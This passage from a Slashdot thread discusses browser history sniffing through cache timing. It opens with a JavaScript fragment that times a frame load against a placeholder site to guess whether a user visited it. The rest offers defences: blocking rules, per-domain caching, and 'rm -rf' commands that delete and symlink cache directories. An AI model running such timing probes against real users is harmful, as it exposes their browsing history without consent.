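frame.src = 'http://victim-site.example/page.html'; // placeholder
setTimeout(function () {
  if (!loaded) {
    frame.src = 'about:blank'; // retargeting kills the in-flight request
    console.log('miss: probably not visited');
  } else {
    console.log('hit: probably visited');
  }
}, 10);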

If it did download the files as you suggest, the second and subsequent tests would always give the result that all sites had been visited. The OP and others on the page are reporting different behavior.

I'm seeing occasional transient false positives on Firefox and I'm not really certain how that can be the case.

Assuming the OP is seeing repeated false positives, I would guess he is behind a caching proxy that is caching aborted requests and, after repeated attempts, occasionally getting those documents to the browser faster than the tool can abort the request.

Alt-t, d, enter (3, Interesting)

Anonymous Coward | more than 2 years ago | (#38261476)

It's a Dutch boy's thumb in the dike, but that quick key combo clears history in Opera. I just habitually hit it between domains to kill tracking without screwing up sites that need cookies or JS to function. Likely there's a Firefox equivalent.

What neither has by default is a way to do this automatically. Browser makers finally got around to letting us limit cookies to the visited site, but they could go much further.

Like just rig browser cache to be per domain -- there's no need for all domains to share the same cache.
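
Conceptually, a per-domain (partitioned) cache just keys every entry by the top-level site as well as the resource URL, so a probe run on one site can never observe entries created while browsing another. A toy JavaScript sketch, not any browser's actual implementation:

// Toy double-keyed cache: the same resource fetched under two different
// top-level sites occupies two independent entries.
var cache = {};
function key(topLevelSite, resourceUrl) {
  return topLevelSite + ' ' + resourceUrl;
}
function put(topLevelSite, resourceUrl, body) {
  cache[key(topLevelSite, resourceUrl)] = body;
}
function get(topLevelSite, resourceUrl) {
  return cache[key(topLevelSite, resourceUrl)]; // undefined on a miss
}

put('bank.example', 'http://cdn.example/logo.png', '...bytes...');
get('attacker.example', 'http://cdn.example/logo.png'); // miss: nothing leaks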

Maybe it's the fetish for the 'fastest' browser? It just seems the makers aren't doing what can be done easily enough on modest modern machines to improve privacy.

A possible fix (2)

Hentes (2461350) | more than 2 years ago | (#38261626)

While this specific implementation is very inaccurate, others using a similar method may work. An obvious workaround to these kinds of attacks is to turn off caching, but that would increase loading times. I was wondering if there is a hack in some browser that would allow you to ban a site from using resources from another domain, whether it's by HTML or scripts. Does anyone know of such a solution?

Re:A possible fix (1)

Anonymous Coward | more than 2 years ago | (#38262630)

In Firefox, the add-on RequestPolicy does this (www.requestpolicy.com).

Re:A possible fix (3, Informative)

_0xd0ad (1974778) | more than 2 years ago | (#38262784)

AdBlock Plus lets you do that very easily.

For example, to block fsdn.com on third-party sites except slashdot.org:

||fsdn.com^$third-party,domain=~slashdot.org

To block fbcdn.com on third-party sites except facebook.com, facebook.net, and fbcdn.net (write similar rules to block the other three Facebook domains):

||fbcdn.com^$third-party,domain=~facebook.com|~facebook.net|~fbcdn.net

Better have good gag reflexes (5, Funny)

axlr8or (889713) | more than 2 years ago | (#38261842)

Cuz if they wanna sniff my browser history they are in for a surprise.

Browser History Sniffing (-1)

Anonymous Coward | more than 2 years ago | (#38261904)

is the new panty sniffing.

Free Douglas Adams! (tribute novella)
http://thepiratebay.org/torrent/6848623/Perfect_Me_By_Jason_Z._Christie

Java gets such a hard time (1)

ExtremeSupreme (2480708) | more than 2 years ago | (#38261910)

Java is considered such a security hole, and yet they sorted out this problem years ago. Java never could catch a break, geez.

Re:Java gets such a hard time (-1)

Anonymous Coward | more than 2 years ago | (#38263668)

Fat, slow and ugly: no other language took so many resources to run 'hello world' or did it so slowly. Has that improved, or is it still only suitable for behemoth applications *gag* where this startup time is small compared to the rest of the app? Certainly not a suitable environment for a platform built of small, rapidly forked and destroyed tools joined together with pipes like unix. That's nothing to do with the language and everything to do with the ghastly vm.

Really? I call BS (1)

Lawrence_Bird (67278) | more than 2 years ago | (#38262142)

I ran this "test" three times in succession. First go it showed sites which yes I might have been to though one, Dogster I was fairly certain I had not. I then clicked it again and this time it came up with almost every site in green. Running a third time gave the same results as the first attempt.

Re:Really? I call BS (1)

Anonymous Coward | more than 2 years ago | (#38262416)

Think about how it works and you will see why it gives you different answers if you run it.

Re:Really? I call BS (1)

gl4ss (559668) | more than 2 years ago | (#38263490)

Well, running Safari, it did get that I had visited Slashdot.

Going to Facebook, it for some reason thought I had gone to Twitter, though.

(I know there's no "Safari" version there, but the IE version did that.)

lcamtuf doing great job again (0)

Anonymous Coward | more than 2 years ago | (#38262436)

Makes me proud to be Polish.

Cache Experiment (Linux) (2, Interesting)

Anonymous Coward | more than 2 years ago | (#38262766)

I'm using Linux and I'm trying the same thing that I do with Adobe Flash... I /dev/null it...

cd ~/.mozilla/firefox/xxxxxxx.default  # replace the x's with your profile's alphanumeric string
rm -rf Cache                           # delete the Cache dir and all subfolders
ln -s /dev/null Cache                  # symlink Cache to /dev/null

Since nothing escapes the event horizon that is /dev/null, your Cache is written but cannot be inspected by others seeking to pry into your well-deserved privacy.

So far, so good. I have noticed no slowness by doing this.

By the way, you can do this with Adobe Flash to prevent your LSO/Super/Flash cookies from being farmed as well.

In your home dir, delete both the .adobe and .macromedia dirs. Some distros only have one or the other. Debian and variants have both.

rm -rf .adobe .macromedia
ln -s /dev/null .adobe
ln -s /dev/null .macromedia

Now you can experience the benefits of Flash without exposing yourself to privacy concerns.

Re:Cache Experiment (Linux) (0)

Anonymous Coward | more than 2 years ago | (#38263308)

Linking a directory to /dev/null is semantically questionable.

You'd be better off creating the directory with mode 000 and making it immutable.

Convenience (2)

pentadecagon (1926186) | more than 2 years ago | (#38263630)

Convenience comes at a price.
You can buy your bread and butter at the local grocery with all your neighbors watching.
Or you can put on a disguise and go to the other end of town, which takes time and increases traffic.